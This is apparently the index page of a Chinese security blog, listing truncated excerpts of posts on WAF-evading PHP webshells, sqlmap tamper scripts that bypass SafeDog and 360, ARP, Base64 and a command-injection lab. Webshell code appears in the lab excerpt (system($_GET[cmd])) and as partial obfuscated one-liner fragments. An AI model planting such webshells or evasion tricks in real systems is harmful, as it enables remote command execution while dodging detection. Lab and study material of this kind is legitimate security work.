蜗蜗侠's Blog-关注网络安全移动版

php过狗一句话

分享一个别的地方看到的 混淆过狗php一句话 ?php $mt=mFsKCleRfU; $ojj=IEBleldle; $hsa=E9TVFsnd2VuJ10p; $fnx=Ow==; $zk = str_replace(d,,sdtdrd_redpdldadcde); //字符串替换：替换sdtdrd_redpdldadcde里的d为空 返回str_replace $ef = $zk(z, , zbazsze...

ARP全攻略分享

前言 我们知道，当我们在浏览器里面输入网址时，DNS服务器会自动把它解析为IP地址，浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址（即MAC地址）的呢？在局域网中，这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义...

Python WEB框架下集成乌云漏洞查询

做渗透的时候遇到一个系统可以到网上搜索下这个系统的相关漏洞，众所周知的原因，wooyun关闭了很久，所以我们最好自己搭建一个乌云镜像。 ...

最优秀的Kali Linux渗透测试课程

0x00 前言 称为最优秀我个人觉得一点都不为过，目前市面上的那些课程先不说能不能把工具实现的原理讲清楚，就连工具的功能也是一知半解，更不说系统完整的渗透测试框架，yuanfh老师可能是我见过讲Kali Linux渗透测试最优秀的老师，很有幸学到老师的课程，老...

Base64 编码介绍、Base64编码转换原理、算法

Base64编码，是我们程序开发中经常使用到的编码方法。它是一种基于用64个可打印字符来表示二进制数据的表示方法。它通常用作存储、传输一些二进制数据编码方法！也是MIME（多用途互联网邮件扩展，主要用作电子邮件标准）中一种可打印字符表示二进制数据的常...

Sqlmap过狗过云锁注入脚本一枚

#!/usr/bin/env python[/color][/size] [size=3][color=lime] Copyright (c) 2006-2016 sqlmap developers ([/color][/size][url=http://sqlmap.org/][size=3][color=lime]http://sqlmap.org/[/color][/size][/url][size=3][color=lime]) See the file doc/C...

Sqlmap过360注入脚本一枚

#!/usr/bin/env python[/color][/size][/b] [b][size=3][color=#ff0000] Copyright (c) 2006-2016 sqlmap developers ([url=http://sqlmap.org/]http://sqlmap.org/[/url]) See the file doc/COPYING for copying permission [/color][/size][/b] [b][size=3...

利用php进行命令注入攻击演练

本机搭建php环境我用的是phpstudy 软件下载地址： http://www.baidu.com 自己配置phpstudy 我就不废话了 网站根目录新建index.php名字随便啊index 我只是图一个方便而已~~！ ?$cmd = $_GET[cmd];echo pre;system($cmd);echo /pre;? 代码写入然后本机访问网站...

OWASP TOP10的安全威胁SQL注射（SQL Injection）

非常感谢大家一直一来对于“深入学习web安全”系列文章的关注，但是我看到很多同学都说看着不过瘾啊！所以，咱们从这节课开始，就用视频来继续学习吧！...

PHP免杀shell的编写，附免杀shell

00x1 先上图： 0x2 编写过程 这里必须强调一下我内心的感觉，小阔爱前两天也研究了过狗的一句话了，然后我突然觉得大家都在进步，我研究点啥呢？不如也试试以前因为觉得自己不懂代码，而不会研究的免杀shell吧。 很多人都在说过狗的方法，大致总结一下就是：...